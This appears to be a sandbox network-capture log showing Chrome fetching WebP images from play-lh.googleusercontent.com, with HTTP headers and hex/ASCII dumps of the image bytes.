                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: ed 79 32 62 24 14 d9 6a 00 25 b0 56 4a 2a 83 d7 f7 17 ce cb 14 16 a9 5f 32 c5 18 03 01 cb 57 ee f3 69 8e f0 e0 ee 4c 69 1c da ba 39 53 9b d3 da 0a 83 d4 1c 66 f4 a6 ba 72 6d cf 36 18 00 dc 3c 3c f0 54 ed a5 f7 e8 c1 d3 36 1a 8d 56 46 f4 c9 72 0d 02 f6 9d 7e de b1 7f ae ed 09 90 47 26 12 c2 7b ef 80 1f f0 ac 09 4e d9 9a 58 9a 88 48 6f de 08 e5 c8 29 8d 40 7a 80 34 ca eb 73 7d e4 d7 b8 ac 8e 40 75 a6 01 4e 4b 14 98 af a8 8b 32 b0 02 e8 0d 93 4d 3c bd 04 70 9f ee ab 35 5b b9 02 5b a1 6d 00 51 a2 cd ac 09 74 4a a5 80 c9 0c a8 29 27 ed b8 63 a0 a7 fb f9 c4 06 ad 84 33 65 10 9b 44 1e 35 40 08 8f 1d 44 23 e4 d4 47 d4 4a 11 42 b1 01 f1 68 1d 33 a8 8b 6e 49 d1 10 17 62 ec d4 4b 8f 2c df 3f 28 f3 63 d2 a6 58 c9 8e 39 92 bf ee 78 79 bf d1 0d 3d f7 c2 a8 e7 48 7a 73
                                                                                                                                                                                                                                Data Ascii: y2b$j%VJ*_2WiLi9Sfrm6<<T6VFr~G&{NXHo)@z4s}@uNK2M<p5[[mQtJ)'c3eD5@D#GJBh3nIbK,?(cX9xy=Hzs
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 2c 86 1b 59 b3 d9 6c 1e 19 36 23 2b 24 27 b2 71 d9 0d 17 fc 30 4b f4 db c5 6a d3 3a 47 e4 aa 30 36 a9 b3 a4 c3 cc cd 37 98 37 96 f2 50 41 d3 35 13 82 a4 df 5c 08 33 39 09 7b 0e a2 58 0c d6 d7 b3 31 e4 a0 0e d4 8b 3e 48 f9 41 c9 a5 c9 9d 16 76 56 fa 7c b3 d5 a5 cb 4a 5d 42 45 60 72 0f 1f c4 77 f8 e0 0f 07 6a 1d 58 bb 38 06 34 79 7b 55 a8 af cc 6f 60 7e fd f3 fc c1 99 5f 74 f1 0b c2 2f 31 fe 9c f8 23 e1 0b 05 b8 2a 8f 87 6b e0 1d d0 77 08 ef 54 be 42 f8 fb e9 eb e9 68 10 bc e2 b0 b3 f4 c9 93 3c 31 41 d4 69 82 e3 04 3e 05 e2 d2 16 52 01 31 c0 96 59 38 47 81 a0 05 04 a9 74 82 5c c8 89 58 44 14 22 03 9c 11 86 4c 23 40 00 69 ff ab fe f1 fe ed ff f7 2c 9a 2d 3d e4 dd 73 11 14 b5 af da 8b db 32 94 67 ad 8b 13 5f 78 fb da fa 3e 1a 7e 05 4b 79 ee bd c5 6e f8 ae fb
                                                                                                                                                                                                                                Data Ascii: ,Yl6#+$'q0Kj:G0677PA5\39{X1>HAvV|J]BE`rwjX84y{Uo`~_t/1#*kwTBh<1Ai>R1Y8Gt\XD"L#@i,-=s2g_x>~Kyn
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 70 b0 11 a8 8a 04 8a 07 c7 d8 62 d1 2d 3b 63 8b b6 53 e6 b7 ea 8f c4 fd 6c d1 46 e4 25 73 61 30 93 62 8e 8c 55 f7 08 68 3d ba 5e 13 70 f7 5e e3 f0 89 c4 b9 f9 f3 71 1f 6d f4 e8 1d 8f 7c a6 f1 a1 22 97 c2 05 26 3a 5a b2 9a 10 c8 26 93 c9 ab bf e8 4d 2b 26 45 02 ba d4 7c 91 77 78 2b 47 42 46 b9 81 07 73 33 de 7f b8 db 8d ce 43 bd 4d b7 dd 34 e2 59 db 1e 0a 81 5c 0f 42 f8 e8 86 d1 2a f4 7c 57 55 69 4c 69 ac ce 19 e6 18 e1 cb c2 0b 43 df f3 31 14 29 e6 a0 3f f6 40 22 14 39 f7 0c ee 91 36 5b 90 b2 e7 4c 6b 40 e7 5a 4a 4a 22 64 f8 08 97 16 2f d7 d3 04 67 31 ca bb 6e 92 0c f6 9a be 18 28 18 d4 3d 23 d4 d4 b0 60 b2 8d 41 69 97 f3 65 2c de ea a8 d1 a8 1f 46 7a 96 c6 41 69 16 8b c5 48 c0 9a 6e 7b 71 ab c5 50 e7 7a b8 42 d7 11 d7 5b bc 9f 3d b9 bc f8 40 67 3d 9d e8
                                                                                                                                                                                                                                Data Ascii: pb-;cSlF%sa0bUh=^p^qm|"&:Z&M+&E|wx+GBFs3CM4Y\B*|WUiLiC1)?@"96[Lk@ZJJ"d/g1n(=#`Aie,FzAiHn{qPzB[=@g=
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: e5 51 5a 81 a4 8d a5 fb 02 46 4d 88 5a 65 5e 34 b3 65 30 cd e5 c3 73 73 c6 76 33 55 51 e5 d2 b8 e9 4c 69 5f 53 f5 40 a5 83 bc f9 59 57 3f 44 34 6c 5e 14 db b4 39 df 5a 6c 97 1a af e0 aa 38 0a 97 8a 03 3c b8 a8 8b dd f4 70 fb 54 26 1a 09 75 97 2f 6c 4a 7c eb ad e2 54 9d 9e 8c a1 77 85 0f 8b 2d 41 75 63 23 ac 51 f5 4f 0e dc f8 3f bb ab 61 22 86 d1 25 a0 ba b2 8c 2c 9c 97 c3 6a 4a 5b 78 ce 77 d5 f4 86 6f 9f 97 be f3 fe eb 27 a6 fe 6e 5b 02 8f 9f 0f 7f f7 f4 65 f0 4e f9 cd cb 6f d2 3a b2 05 67 0e 77 42 74 68 e0 e0 23 6a a7 33 9c 71 fa f9 81 b6 8c e7 ce be 3c 51 75 40 9f 73 f4 31 ca 58 9c c3 37 08 01 04 4c ac ec c8 58 69 8d ab 6a 4e 48 de 61 a9 ef 53 6a aa db 11 48 eb 2a 63 31 58 a2 1e 93 ef 9f 7b b2 28 31 c7 74 d1 da 09 88 1d 13 de 40 a6 cd 56 11 2e 37 8b fd
                                                                                                                                                                                                                                Data Ascii: QZFMZe^4e0ssv3UQLi_S@YW?D4l^9Zl8<pT&u/lJ|Tw-Auc#QO?a"%,jJ[xwo'n[eNo:gwBth#j3q<Qu@s1X7LXijNHaSjH*c1X{(1t@V.7
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 1b af c0 e2 dc 0f 04 cd 19 9c f2 19 4e e1 36 30 36 2f 99 5a 60 4b 82 44 a4 9b 15 8b fb f3 43 05 cb cf 3c 27 aa ff 0e 1e c6 2a 96 f1 10 5c 84 f1 11 3a b2 d6 37 1c af 29 43 c7 87 40 d6 22 8a ca 0e 90 03 f3 3a c5 03 4a 7b 5e 9f fc 8c 0b 1a dc b0 3f 3d cb e3 e7 91 99 27 f7 ad a2 b5 87 c7 2a 70 26 f1 e3 35 cc 48 c0 33 1b 3e 5d f1 5b f8 1a 20 81 42 b8 47 12 88 41 38 10 ce 41 69 fe 9d ed 64 4f 55 92 8c c7 d1 9e 36 24 f7 54 5d c0 3e c7 32 66 f9 cd 2c 19 17 33 77 b2 b5 da cb 5b 49 19 c6 75 59 46 5e 3f 54 f4 dd 10 e5 55 bb 50 85 37 0c 06 8c ee b5 d6 0e 79 0e 60 72 b6 07 61 93 07 93 9f 48 81 2e 73 88 89 92 6e a9 33 be 48 5b 74 e0 50 b5 c7 12 94 81 ae 0a 55 28 41 16 fc 90 90 a4 34 27 0f d9 b2 18 02 62 90 56 a9 50 b4 f4 95 bd 64 9a 40 4e 28 86 11 29 6f 4b e9 cc 6e 46
                                                                                                                                                                                                                                Data Ascii: N606/Z`KDC<'*\:7)C@":J{^?='*p&5H3>][ BGA8AidOU6$T]>2f,3w[IuYF^?TUP7y`raH.sn3H[tPU(A4'bVPd@N()oKnF


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                104192.168.2.449991142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1092OUTGET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 326
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 56
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC326INData Raw: 52 49 46 46 3e 01 00 00 57 45 42 50 56 50 38 4c 31 01 00 00 2f 3f c0 0f 00 85 5c 5b db 8e 3d 7a ce 2a 2b 7d 8e c2 e9 54 a7 b6 9d d2 b6 6d db b6 6d 6b 3c 73 15 df fb 7e ff 7c ef 18 45 44 ff 27 40 fe 33 d8 58 dd a0 0b a9 ab 4d 51 25 d7 d6 a6 eb 42 eb ea c2 1d 01 74 cd b0 ae 5a 03 5a 34 43 30 62 4a 3d 2c ab 96 00 86 54 7d 30 f8 8d 30 f3 cd b1 f6 4d d5 1d 02 7b df 52 8b ec 01 67 df 50 ab c8 1a 70 23 bd df 90 cc 00 37 03 06 55 ba 26 43 28 1d bb be 51 5e bf 7c 05 69 31 c3 b6 6b 52 61 da 86 6a 1d ba 54 92 09 8c 3a 12 1b 61 3b 2a 58 15 14 15 ed a9 91 80 a8 68 7f 47 7e ff bf b9 7f a3 2b 79 7e 1a 55 55 3e 3f 9c e8 2e 1f 9e 33 1c 01 74 8d b0 a2 6a 03 5a 54 43 40 89 29 f5 b0 ac 6a 05 f0 b0 f8 01 14 7d 23 97 96 87 6f 89 62 91 26 be 9d 07 40 dc 81 fb 6f 65 62 09 d6 0e
                                                                                                                                                                                                                                Data Ascii: RIFF>WEBPVP8L1/?\[=z*+}Tmmk<s~|ED'@3XMQ%BtZZ4C0bJ=,T}00M{RgPp#7U&C(Q^|i1kRajT:a;*XhG~+y~UU>?.3tjZTC@)j}#ob&@oeb


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                105192.168.2.449993142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1091OUTGET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 686
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:10:43 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:10:43 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 6239
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC686INData Raw: 52 49 46 46 a6 02 00 00 57 45 42 50 56 50 38 4c 99 02 00 00 2f 3f c0 0f 00 05 25 6a db 0c 49 d6 3f c6 d2 5c 71 65 db f6 b5 6d db b6 6d fb de b1 6d db b6 da b6 f5 2e fe 88 c8 88 bc ab d9 45 f4 7f 02 e4 f2 f6 d4 67 de 7a fb cd 7b ba fe 3f 7a cf 38 5e 88 3d 73 d7 e7 71 fb 26 85 e8 47 ee 89 d1 1b c5 f8 bd 30 26 2e 87 f1 3f 3f 16 6d 0a 31 67 6e fe ee a1 81 22 32 e5 a5 ff 0e 94 9b 38 1d 83 76 e5 18 57 75 17 f7 c7 0e 1b 48 0b 57 8c de 2c 1e 87 25 28 2e 86 3a 8d 7e 5a fc ce 50 ac 0b f3 0d 7a ac f8 7e 4f f1 68 90 1a 75 97 f8 ff 46 15 86 58 0a 30 47 42 ee 06 f8 33 40 0d 90 2b 8e 0f ac 3a 9b 91 95 76 62 f1 35 0e 52 09 94 fa fb 01 e0 2d db 2b b9 d8 53 ee b2 fd 01 f0 91 b7 f3 40 81 58 77 e2 3e cb 22 55 c0 09 6f 00 f3 2d c7 89 3a c3 b2 0e c0 d7 07 6a 80 69 31 c6 b3 1b
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/?%jI?\qemmm.Egz{?z8^=sq&G0&.??m1gn"28vWuHW,%(.:~ZPz~OhuFX0GB3@+:vb5R-+S@Xw>"Uo-:ji1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                106192.168.2.449992142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1092OUTGET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 536
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 6729
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC536INData Raw: 52 49 46 46 10 02 00 00 57 45 42 50 56 50 38 4c 03 02 00 00 2f 3f c0 0f 00 df e3 36 b6 6d 55 d9 f7 bd 87 bb 53 01 65 58 ff f9 cf a8 80 c8 f5 dd 7b da 70 1b db b6 aa ac ef 9a 91 6b 46 ff 31 15 d0 01 a9 74 e0 7a dc c4 b6 ed 2a e7 fc 1c 3a 24 e4 a8 03 07 88 42 18 3a 18 3a ca 0f d5 0f bc bb e7 3f 14 da f9 0a 56 94 ea b5 43 d1 83 35 0c 86 11 11 f9 53 16 0a f0 07 a4 32 e7 bf 2f 99 00 bf 5d c1 ac c0 4c 0f 66 6c e8 06 39 23 c8 b5 2f 86 5c fc 27 08 ad e5 41 f3 b4 f7 58 30 e6 92 df 2d 17 50 f3 27 98 3c 0a 69 9b b3 c2 28 e4 7c 80 47 fe ff 85 48 9a df 00 97 a4 3e 49 32 a5 28 64 99 4b 03 17 02 42 a8 49 14 08 44 ac b0 2a 09 d0 67 2d 17 99 c2 6e 19 39 28 16 20 f8 e6 cf c1 e1 73 4a 3e 01 05 fc 8f a7 90 13 14 54 10 21 22 72 13 5e 09 41 96 8b 27 23 82 34 0d 00 2b f0 49 10
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/?6mUSeX{pkF1tz*:$B::?VC5S2/]Lfl9#/\'AX0-P'<i(|GH>I2(dKBID*g-n9( sJ>T!"r^A'#4+I


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                107192.168.2.449995216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC530OUTGET /CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 46200
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:16:17 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:16:17 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 2305
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC856INData Raw: 52 49 46 46 70 b4 00 00 57 45 42 50 56 50 38 20 64 b4 00 00 90 82 02 9d 01 2a d0 02 60 01 3e 55 24 8f 45 23 a2 21 25 29 34 0b e8 a0 0a 89 63 6d e7 ec 0c ce 50 7b 63 ac 94 89 65 f1 71 3e 76 fc 2d 2b f9 18 57 dd 77 81 f7 87 ee 25 c9 7e 3f fd 8f c8 1c d6 1b f7 98 8f 4b 7f bb fb 79 f9 87 e9 ef cc 5f f5 f3 f6 3f fb ef a1 cf c2 1f de 2f 56 5f ad 1f f2 ff c0 7b b3 7f d5 ff 87 fe 53 e0 1f f5 9f f7 ff ee 3d c0 ff 8c ff 3c fb ef ef 8d fd b1 f6 06 fe 67 fd 9f ef ff e3 7b ff 17 fb 7f 86 af da 8f da 1f 80 ff e6 df d9 bf ec 7e 7f ff e0 fa 00 f4 00 ea 17 83 9f 9f f5 ab fa 1f dc bf d0 fc e2 f8 8b fe 67 0f fe f5 fe a7 ed 97 a9 1f 78 1f a9 eb d3 fc ae fd 7f 63 fe db d0 3b f3 af ee 1f f0 37 e6 7a 1f 32 0f 07 7f d4 ff 35 f9 37 f2 8f 37 4f ac bf 87 ff 9f dc 17 f3 17 d8 af 02
                                                                                                                                                                                                                                Data Ascii: RIFFpWEBPVP8 d*`>U$E#!%)4cmP{ceq>v-+Ww%~?Ky_?/V_{S=<g{~gxc;7z2577O
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 34 ca 75 c8 d9 49 5f 99 8d cf 64 33 cd 6b 91 09 57 54 c1 83 15 d9 30 ba a2 bd dd ed a1 15 06 2b 5d 3a 25 c5 96 c8 41 56 5a e7 8c 95 66 c3 55 0a 5b 83 b7 b1 5c 7c 5c 60 df d0 fb 9f 2d 2e 0e 98 25 d5 db b1 3c 00 4f dc bd dd cf 84 55 7f b2 7b 7d 32 04 61 94 d2 c6 1e f7 09 b8 fc 58 67 d5 e2 e3 03 8f 55 75 c8 88 d0 f8 08 b5 a0 e7 12 27 a4 74 c7 e7 d7 a9 5e 78 67 a6 78 2e 42 5d a1 b7 e5 7e c6 11 83 de 92 01 de d9 ba f0 ad eb 0c 3a d5 0e c8 bb c8 b6 c5 e0 3c ad 5d 00 04 47 57 93 6b 26 15 d6 07 b3 af b1 6f 32 0d 82 b0 40 7f 55 ae ea aa 92 b4 dd 03 a7 83 e9 fe 7c 15 c5 02 5e 4a f0 7e f1 2e c9 67 d7 77 55 89 48 f7 1c cd 46 fe ca 73 dd fd 2f f6 f8 b8 61 06 fc 57 9d 98 6c c6 9d fe 07 9a 33 f4 3a ff dd 68 70 d8 9e 58 8f aa d7 ae f8 40 1d 67 7d 3c 5a d4 c9 43 8b 18 86
                                                                                                                                                                                                                                Data Ascii: 4uI_d3kWT0+]:%AVZfU[\|\`-.%<OU{}2aXgUu't^xgx.B]~:<]GWk&o2@U|^J~.gwUHFs/aWl3:hpX@g}<ZC
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: d0 05 f6 68 d1 52 90 ff e4 8e 50 99 0a e4 7d 94 88 04 9e 80 09 bf 60 93 ca b1 ff f3 f4 3d 9b ea c0 e2 ed 89 ce e8 7a 8d be 3e d6 7a 33 4b 74 23 13 1b 3e 5c 38 bd 4f f1 8e c0 32 83 dd b7 a7 c7 6e 80 fb 16 ce bf 03 1b 31 67 99 23 74 c9 5f 10 7d e5 3d 6b 83 6e cf 89 03 f6 92 16 24 06 ed 7b 64 69 f6 82 8d 37 b4 53 d1 7c 61 e0 3f 64 18 ed 4f 98 4b 2a de 74 ba da c2 f4 94 48 41 2f 83 15 ea 7b f3 b0 30 53 7b 16 23 11 06 e3 b4 7d d8 a1 1c 5e 30 ab 87 90 52 f8 ba 76 f4 3e 1e 89 f5 66 a0 de 2d 30 fe 6b 39 9c 96 20 c9 d5 1d 8a 39 2a 4b a9 b1 ef e5 ef d6 f6 c7 f1 28 8f 35 ed 00 11 52 d1 7d 26 b1 5c 9e 93 52 a2 b1 6b b8 79 ef 7c 30 f0 32 18 c6 ba 7e 49 6a 48 68 70 3d 1b 37 7b 70 0f 3b 2f 28 e6 4e 37 64 58 ec c2 b5 d4 92 ad d5 29 00 26 2e 13 85 65 30 6c f0 1d 71 c9 aa
                                                                                                                                                                                                                                Data Ascii: hRP}`=z>z3Kt#>\8O2n1g#t_}=kn${di7S|a?dOK*tHA/{0S{#}^0Rv>f-0k9 9*K(5R}&\Rky|02~IjHhp=7{p;/(N7dX)&.e0lq
